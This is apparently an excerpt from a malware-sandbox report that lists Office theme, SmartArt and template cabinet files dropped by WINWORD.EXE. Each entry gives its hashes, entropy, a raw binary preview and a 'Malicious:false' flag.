                                                                                                                                                                                                                                                                SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                                                                                                                                                                                                                                SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                                                                                                                                                                                                                                SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):307348
                                                                                                                                                                                                                                                                Entropy (8bit):7.996451393909308
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                                                                                                                                                                                                                                                MD5:0EBC45AA0E67CC435D0745438371F948
                                                                                                                                                                                                                                                                SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                                                                                                                                                                                                                                                SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                                                                                                                                                                                                                                                SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):276650
                                                                                                                                                                                                                                                                Entropy (8bit):7.995561338730199
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                                                                                                                                                                                                                                MD5:84D8F3848E7424CBE3801F9570E05018
                                                                                                                                                                                                                                                                SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                                                                                                                                                                                                                                SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                                                                                                                                                                                                                                SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):271273
                                                                                                                                                                                                                                                                Entropy (8bit):7.995547668305345
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                                                                                                                                                                                                                                MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                                                                                                                                                                                                                                SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                                                                                                                                                                                                                                SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                                                                                                                                                                                                                                SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):295527
                                                                                                                                                                                                                                                                Entropy (8bit):7.996203550147553
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                                                                                                                                                                                                                                MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                                                                                                                                                                                                                                SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                                                                                                                                                                                                                                SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                                                                                                                                                                                                                                SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):222992
                                                                                                                                                                                                                                                                Entropy (8bit):7.994458910952451
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                                                                                                                                                                                                                                MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                                                                                                                                                                                                                                SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                                                                                                                                                                                                                                SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                                                                                                                                                                                                                                SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):261258
                                                                                                                                                                                                                                                                Entropy (8bit):7.99541965268665
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                                                                                                                                                                                                                                MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                                                                                                                                                                                                                                SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                                                                                                                                                                                                                                SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                                                                                                                                                                                                                                SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):723359
                                                                                                                                                                                                                                                                Entropy (8bit):7.997550445816903
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                                                                                                                                                                                                                                MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                                                                                                                                                                                                                                SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                                                                                                                                                                                                                                SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                                                                                                                                                                                                                                SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):230916
                                                                                                                                                                                                                                                                Entropy (8bit):7.132009035480313
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:OTA6QGRktMXNngQkXWnWoP6hVUGpqaEtpMdnC8euGIfXLq+gCrXPyHewslxg9QRy:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1
                                                                                                                                                                                                                                                                MD5:49FCE115FD0EB027F713DAB9B42CD557
                                                                                                                                                                                                                                                                SHA1:CE7293043117187F198A4A451D2AFEEE80C70AC9
                                                                                                                                                                                                                                                                SHA-256:E6400870B60EDF90B746257DFB74BD2D8DD637B5EC25F0463A473466EF4C1E31
                                                                                                                                                                                                                                                                SHA-512:EC752596061820DA9288B4AB8081F44962234EF654B50C0861F1BA9DE967152294DC3AC3D1418EE268F952849C76A7C4C5081FC7007B5797412677836969EDFB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20457
                                                                                                                                                                                                                                                                Entropy (8bit):7.612540359660869
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                                                                                                                                                                                                                                MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                                                                                                                                                                                                                                SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                                                                                                                                                                                                                                SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                                                                                                                                                                                                                                SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):34816
                                                                                                                                                                                                                                                                Entropy (8bit):7.840826397575377
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                                                                                                                                                                                                                                                MD5:62863124CDCDA135ECC0E722782CB888
                                                                                                                                                                                                                                                                SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                                                                                                                                                                                                                                SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                                                                                                                                                                                                                                SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):550906
                                                                                                                                                                                                                                                                Entropy (8bit):7.998289614787931
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                                                                                                                                                                                                                                MD5:1C12315C862A745A647DAD546EB4267E
                                                                                                                                                                                                                                                                SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                                                                                                                                                                                                                                SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                                                                                                                                                                                                                                SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):640684
                                                                                                                                                                                                                                                                Entropy (8bit):7.99860205353102
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                                                                                                                                                                                                                                MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                                                                                                                                                                                                                                SHA1:166398552F6B7F4509732E148F93E207DD60420B
